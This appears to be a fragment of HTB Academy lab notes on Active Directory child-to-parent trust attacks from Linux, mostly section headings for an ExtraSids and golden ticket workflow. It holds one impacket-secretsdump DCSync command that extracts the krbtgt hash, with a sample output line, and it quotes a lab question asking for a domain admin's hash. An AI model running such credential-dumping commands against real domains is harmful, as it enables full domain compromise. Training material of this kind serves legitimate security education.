🐧Child → Parent Trust Attacks - from Linux
🎯 HTB Academy: Active Directory Enumeration & Attacks
📍 Overview
🛠️ Linux Attack Methodology
Required Data Points (Same as Windows)
Component
Linux Collection Method
Example Value
Step 1: KRBTGT Hash Extraction
# DCSync attack for KRBTGT account
impacket-secretsdump logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
# Output extract:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::Step 2: Child Domain SID Discovery
Step 3: Enterprise Admins SID Enumeration
Step 4: Golden Ticket Creation
Step 5: Environment Setup & Exploitation
🚀 Automated Attack Option
raiseChild.py - Complete Automation
Automation Workflow
🎯 HTB Academy Lab Solution
Lab Environment Setup
🎫 Question: "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer."
⚠️ Tool Considerations
Manual vs Automated Approach
Impacket Tool Prefix
Environment Variables
🔑 Key Takeaways
Cross-Platform Attack Capability
Critical Success Factors
Professional Value
Last updated